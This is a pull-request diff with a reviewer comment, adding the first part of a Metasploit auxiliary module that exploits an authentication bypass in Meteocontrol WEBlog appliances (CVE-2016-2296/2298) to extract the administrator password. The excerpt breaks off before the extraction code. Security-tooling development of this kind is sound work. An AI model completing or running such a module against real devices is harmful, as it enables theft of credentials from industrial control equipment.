modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb

```diff
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Meteocontrol WEBlog Password Extractor',
+      'Description' => %{
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
+      },
+      'References'  =>
+        [
+          ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
+          ['CVE', '2016-2296'],
+          ['CVE', '2016-2298']
+        ],
+      'Author'         =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+        ],
+      'License'        => MSF_LICENSE))
+
+    register_options(
+      [
+        Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
+      ], self.class
+    )
+  end
+
+  def run_host(ip)
+    unless is_app_metweblog?
+      return
+    end
+
+    do_extract
+  end
+
+  #
+  # Check if App is Meteocontrol WEBlog
+  #
+
+  def is_app_metweblog?
```

Comment:
Thanks. I haven't used this earlier. Will take a look at it. For now, I will skip it for this module.